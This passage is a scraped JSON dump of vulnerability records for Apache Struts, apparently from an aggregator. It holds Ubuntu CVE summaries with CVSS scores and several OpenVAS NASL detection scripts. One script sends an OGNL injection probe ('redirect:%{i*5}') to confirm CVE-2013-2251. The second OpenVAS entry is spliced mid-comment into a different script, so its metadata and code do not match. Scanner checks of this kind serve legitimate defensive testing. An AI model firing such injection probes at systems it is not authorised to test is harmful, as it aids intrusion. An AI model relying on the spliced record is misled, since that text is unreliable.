"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2013-07-16T00:00:00", "id": "UB:CVE-2013-2134", "href": "https://ubuntu.com/security/CVE-2013-2134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-27T11:24:25", "description": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard\ncookiesName value is used, does not properly restrict access to the\ngetClass method, which allows remote attackers to \"manipulate\" the\nClassLoader and execute arbitrary code via a crafted request. NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0113", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0113"], "modified": "2014-04-29T00:00:00", "id": "UB:CVE-2014-0113", "href": "https://ubuntu.com/security/CVE-2014-0113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-27T11:27:00", "description": "ParametersInterceptor in Apache Struts before 2.3.20 does not properly\nrestrict access to the getClass method, which allows remote attackers to\n\"manipulate\" the ClassLoader and execute arbitrary code via a crafted\nrequest. 
NOTE: this vulnerability exists because of an incomplete fix for\nCVE-2014-0094.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0112", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-04-29T00:00:00", "id": "UB:CVE-2014-0112", "href": "https://ubuntu.com/security/CVE-2014-0112", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-27T11:15:16", "description": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard\ncookiesName value is used, does not properly restrict access to the\ngetClass method, which allows remote attackers to \"manipulate\" the\nClassLoader and modify session state via a crafted request. 
NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2014-0113.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | per Debian: <not-affected> (Struts 2.0.0 through to Struts 2.3.16.2)\n", "cvss3": {}, "published": "2014-05-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0116", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0113", "CVE-2014-0116"], "modified": "2014-05-08T00:00:00", "id": "UB:CVE-2014-0116", "href": "https://ubuntu.com/security/CVE-2014-0116", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-06-28T15:12:36", "description": "Apache Struts 2.3.1.2 and earlier, 2.3.19-2.3.23, provides interfaces that\ndo not properly restrict access to collections such as the session and\nrequest collections, which might allow remote attackers to modify run-time\ndata values via a crafted parameter to an application that implements an\naffected interface, as demonstrated by the SessionAware, RequestAware,\nApplicationAware, ServletRequestAware, ServletResponseAware, and\nParameterAware interfaces. 
NOTE: the vendor disputes the significance of\nthis report because of an \"easy work-around in existing apps by configuring\nthe interceptor.\"\n\n#### Bugs\n\n * <https://issues.apache.org/jira/browse/WW-3631>\n * <https://issues.apache.org/jira/browse/WW-2264>\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "ubuntucve", "title": "CVE-2011-5057", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5057"], "modified": "2012-01-08T00:00:00", "id": "UB:CVE-2011-5057", "href": "https://ubuntu.com/security/CVE-2011-5057", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T14:20:59", "description": "In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an\nunintentional expression in a Freemarker tag instead of string literals can\nlead to a RCE attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-20T00:00:00", "type": "ubuntucve", "title": "CVE-2017-12611", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2017-09-20T00:00:00", "id": "UB:CVE-2017-12611", "href": "https://ubuntu.com/security/CVE-2017-12611", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T14:43:21", "description": "Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE\nbefore 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single\nbyte page encoding, allows remote attackers to inject arbitrary web script\nor HTML via multi-byte characters in a url-encoded parameter.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ebarretto](<https://launchpad.net/~ebarretto>) | Only affects 2.0.0 to 2.3.24.1\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-04-12T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4003", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2016-4003"], "modified": "2016-04-12T00:00:00", "id": "UB:CVE-2016-4003", "href": "https://ubuntu.com/security/CVE-2016-4003", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-16T21:07:03", "description": "Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/>\nvalues, which allows remote attackers to bypass the CSRF protection\nmechanism.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | 2.0.0+\n", "cvss3": {}, "published": "2014-12-10T00:00:00", "type": "ubuntucve", "title": "CVE-2014-7809", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2014-12-10T00:00:00", "id": "UB:CVE-2014-7809", "href": "https://ubuntu.com/security/CVE-2014-7809", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-13T10:43:32", "description": "The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not\nproperly validate the token name configuration parameter, which allows\nremote attackers to perform cross-site request forgery (CSRF) attacks by\nsetting the token name configuration parameter to a session attribute.", "cvss3": {}, "published": "2012-09-05T00:00:00", "type": "ubuntucve", "title": "CVE-2012-4386", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4386"], "modified": "2012-09-05T00:00:00", "id": "UB:CVE-2012-4386", "href": "https://ubuntu.com/security/CVE-2012-4386", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-25T03:06:10", "description": "Apache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass\naccess controls via a crafted action: prefix.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | affects 2.0.0+\n", "cvss3": {}, "published": "2013-09-30T00:00:00", "type": "ubuntucve", "title": "CVE-2013-4310", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310"], "modified": "2013-09-30T00:00:00", "id": "UB:CVE-2013-4310", "href": "https://ubuntu.com/security/CVE-2013-4310", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-09-10T22:11:52", "description": "Cross-site scripting (XSS) vulnerability in Apache Struts before 2.3.20.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | only affects Struts 2.0.0 - 2.3.16.3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-09-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5169", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5169"], "modified": "2017-09-25T00:00:00", "id": "UB:CVE-2015-5169", "href": "https://ubuntu.com/security/CVE-2015-5169", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-10T22:31:56", "description": "Apache Struts 2.x before 2.3.24.1 allows remote attackers to manipulate\nStruts internals, alter user sessions, or affect container settings via\nvectors involving a top object.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ratliff](<https://launchpad.net/~ratliff>) | upstream has a documented work-around \n[debian](<https://launchpad.net/~debian>) | Only affects versions >= 2.x\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-29T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5209", 
"bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2017-08-29T00:00:00", "id": "UB:CVE-2015-5209", "href": "https://ubuntu.com/security/CVE-2015-5209", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T14:37:25", "description": "Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to\nhave unspecified impact via vectors related to improper action name clean\nup.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | The advisory says \"Struts 2.0.0 - Struts 2.3.28.1\" is affected but doesn't make a positive statement why those bounds.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-03T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4436", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4436"], "modified": "2016-10-03T00:00:00", "id": "UB:CVE-2016-4436", "href": "https://ubuntu.com/security/CVE-2016-4436", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2018-01-15T13:08:51", "description": "This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.", "cvss3": {}, "published": "2013-07-24T00:00:00", "type": "openvas", "title": "Apache Struts2 Redirection and Security Bypass Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-01-11T00:00:00", "id": "OPENVAS:803838", "href": "http://plugins.openvas.org/nasl.php?oid=803838", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_mult_redirect_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 Redirection and Security Bypass Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803838);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61196, 61189);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-24 11:58:54 +0530 (Wed, 24 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Redirection and Security Bypass Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send an expression along with the redirect command\n via HTTP GET request and check whether it is redirecting and solve the expression or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaws are due to improper sanitation of 'action:',\n 'redirect:', and 'redirectAction:' prefixing parameters before being used in\n DefaultActionMapper.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attacker\n to execute arbitrary arbitrary Java code via OGNL (Object-Graph Navigation Language)\n or redirect user to a malicious url.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 2.0.0 to 2.3.15\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.15.1 or later,\n 
For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/54118\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/fulldisclosure/2013/Jul/157\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-016.html\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-017.html\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nres = \"\";\nreq = \"\";\nresult = \"\";\ndir = \"\";\nurl = \"\";\n\n## Get HTTP Port\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm the application\nif(asres && \">Struts2 Showcase<\" >< asres && \">Welcome!<\" >< asres)\n{\n calc = make_list(2, 3);\n\n foreach i (calc)\n {\n ## Construct attack request\n url = dir + \"/showcase.action?redirect%3A%25%7B\"+ i +\"*5%7D\";\n\n req = http_get(item:url, port:asport);\n res = http_keepalive_send_recv(port:asport, data:req);\n\n if(res =~ \"HTTP/1.. 
302\" && res =~ \"Location:.*/([0-9]+)?\")\n {\n result = eregmatch(pattern: string(dir, \"/([0-9]+)?\"), string:res);\n\n if ( !result || result[1] >!< i * 5 ) exit(0);\n }\n else exit(0);\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:04", "description": "This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.", "cvss3": {}, "published": "2013-07-24T00:00:00", "type": "openvas", "title": "Apache Struts2 Redirection and Security Bypass Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310803838", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803838", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_mult_redirect_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Apache Struts2 Redirection and Security Bypass Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
This may\n lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x before 2.3.29\n and 2.5.x before 2.5.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.29\n or 2.5.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-035.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.28.1\"))\n {\n fix = \"2.3.29\";\n VULN = TRUE ;\n }\n\n else if(version_is_equal(version:appVer, test_version:\"2.5\"))\n {\n fix = \"2.5.1\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix);\n security_message(data:report, port:appPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:21:13", "description": "This host is running Apache Struts and is\n prone to security bypass vulnerability.", "cvss3": {}, "published": "2017-08-31T00:00:00", "type": "openvas", "title": "Apache Struts 'top' Object Access Security Bypass Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5209"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310811316", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811316", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_top_object_sec_bypass_vuln_nov16_lin.nasl 63355 2016-11-18 11:00:43 +0530 Nov$\n#\n# Apache Struts 'top' Object Access Security Bypass Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811316\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2015-5209\");\n script_bugtraq_id(82550);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-31 13:48:08 +0530 (Thu, 31 Aug 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Struts 'top' Object Access Security Bypass Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to security bypass 
vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to due to an incorrect\n handling of the 'top' object in specially crafted request.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to\n bypass certain security restrictions and perform unauthorized actions. This may\n lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x before 2.3.24.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.24.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-026.html\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1033908\");\n script_xref(name:\"URL\", value:\"https://vuldb.com/?id.105878\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ 